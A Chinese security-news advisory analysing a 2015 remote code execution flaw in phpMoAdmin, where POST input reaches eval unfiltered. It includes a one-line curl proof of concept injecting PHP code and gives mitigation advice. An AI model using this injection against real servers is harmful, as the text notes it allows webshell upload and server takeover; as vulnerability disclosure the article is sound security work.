当前位置:安全客 >> 知识详情

MongoDB phpMoAdmin远程代码执行漏洞分析(附EXP)

2015-03-04 13:37:09 阅读:0次 收藏 来源: 360安全播报

近日,代号为sp1nlock的黑客在phpMoAdmin上发现了一个远程代码执行0day漏洞,利用该漏洞攻击者可远程执行任意代码进而上传webshell、控制服务器。据悉目前该漏洞已经在黑市流传。

关于phpMoAdmin

phpMoAdmin是一个用PHP开发的在线MongoDB管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON格式数据的导入导出。

漏洞仍然没有修复

目前官方还没有给出任何的修复补丁,也就是说用这套管理软件的用户仍然处于危险之中,但是据悉漏洞已经被广泛利用。

漏洞分析

在moadmin.php文件第692行的saveObject函数中,将$obj直接带入了eval。

t01f5bf442f93f69f70.png

看看哪里调用了这个函数:

第787行调用了该函数,$obj直接从$_POST['object']取值,也没有做任何处理。从而造成了任意代码执行。

t01be163ac055ea2e38.png

利用漏洞

$ curl "http://localhost/moadmin.php?collection=1" -d "object=1;phpinfo();exit"


t01a11a8be6eaec8975.png

修复方案

建议在开发者修复该漏洞前停用phpMoAdmin。

或者使用htaccess对moadmin.php文件做访问限制。


本文由 安全客 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/learning/detail/274.html

参与讨论,请先 | 注册 | 匿名评论
发布
用户评论
无任何评论